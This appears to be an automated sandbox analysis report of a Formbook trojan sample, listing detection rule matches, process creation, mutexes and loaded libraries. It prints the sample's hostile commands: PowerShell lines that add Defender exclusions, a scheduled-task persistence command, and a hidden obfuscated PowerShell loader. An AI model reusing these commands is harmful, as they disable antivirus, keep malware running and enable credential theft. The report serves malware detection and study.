Source: 00000009.00000002.1575852421.0000000000BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1578650551.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.3719927203.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: P1 HWT623ATG.bat.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GnVIdcfKFYG.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, s1DyL6nIr3WcZnwnks.cs	Security API names: _0020.SetAccessControl
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, s1DyL6nIr3WcZnwnks.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, s1DyL6nIr3WcZnwnks.cs	Security API names: _0020.AddAccessRule
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, s1DyL6nIr3WcZnwnks.cs	Security API names: _0020.SetAccessControl
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, s1DyL6nIr3WcZnwnks.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, s1DyL6nIr3WcZnwnks.cs	Security API names: _0020.AddAccessRule
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, FcbtOO8WgfsF9hQ5gx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, FcbtOO8WgfsF9hQ5gx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: P1 HWT623ATG.bat.exe, Form1.cs	Suspicious URL: 'http://yandex.ru', 'http://yandex.ru', 'http://yandex.ru', 'http://yandex.ru', 'http://yandex.ru', 'http://yandex.ru/search/?lr=213&text=', 'http://yandex.ru/search/?lr=213&text=', 'http://yandex.ru/search/?lr=213&text=', 'http://yandex.ru', 'http://google.ru/', 'http://rambler.ru/'
Source: GnVIdcfKFYG.exe.1.dr, Form1.cs	Suspicious URL: 'http://yandex.ru', 'http://yandex.ru', 'http://yandex.ru', 'http://yandex.ru', 'http://yandex.ru', 'http://yandex.ru/search/?lr=213&text=', 'http://yandex.ru/search/?lr=213&text=', 'http://yandex.ru/search/?lr=213&text=', 'http://yandex.ru', 'http://google.ru/', 'http://rambler.ru/'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@32/36@18/13

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

File created: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7424:120:WilError_03
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Mutant created: \Sessions\1\BaseNamedObjects\NLftZvQIHbkokWBvTZTwYukEvYy
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

File created: C:\Users\user\AppData\Local\Temp\tmpC293.tmp

Source: P1 HWT623ATG.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: P1 HWT623ATG.bat.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: compact.exe, 0000001A.00000003.1814646403.0000000003543000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000001A.00000002.3711399927.0000000003568000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000001A.00000002.3711399927.0000000003597000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000001A.00000003.1814646403.0000000003568000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: P1 HWT623ATG.bat.exe

ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

File read: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe:Zone.Identifier

Source: unknown	Process created: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe "C:\Users\user\Desktop\P1 HWT623ATG.bat.exe"
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P1 HWT623ATG.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GnVIdcfKFYG" /XML "C:\Users\user\AppData\Local\Temp\tmpC293.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe "C:\Users\user\Desktop\P1 HWT623ATG.bat.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GnVIdcfKFYG" /XML "C:\Users\user\AppData\Local\Temp\tmpDBA9.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process created: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe "C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe"
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Users\user\AppData\Local\Temp\bfc.exe "C:\Users\user~1\AppData\Local\Temp\bfc.exe"
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Algolagnic=Get-Content 'C:\Users\user\AppData\Local\erindres\keres\Renowned.tha';$Gnaskerierne=$Algolagnic.SubString(53079,3);.$Gnaskerierne($Algolagnic)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Smilet.exe "C:\Users\user~1\AppData\Local\Temp\Smilet.exe"
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P1 HWT623ATG.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe"	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GnVIdcfKFYG" /XML "C:\Users\user\AppData\Local\Temp\tmpC293.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process created: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe "C:\Users\user\Desktop\P1 HWT623ATG.bat.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GnVIdcfKFYG" /XML "C:\Users\user\AppData\Local\Temp\tmpDBA9.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Process created: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe "C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe"	Jump to behavior
Source: C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe	Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Users\user\AppData\Local\Temp\bfc.exe "C:\Users\user~1\AppData\Local\Temp\bfc.exe"
Source: C:\Users\user\AppData\Local\Temp\bfc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Algolagnic=Get-Content 'C:\Users\user\AppData\Local\erindres\keres\Renowned.tha';$Gnaskerierne=$Algolagnic.SubString(53079,3);.$Gnaskerierne($Algolagnic)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Smilet.exe "C:\Users\user~1\AppData\Local\Temp\Smilet.exe"

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Section loaded: edputil.dll	Jump to behavior
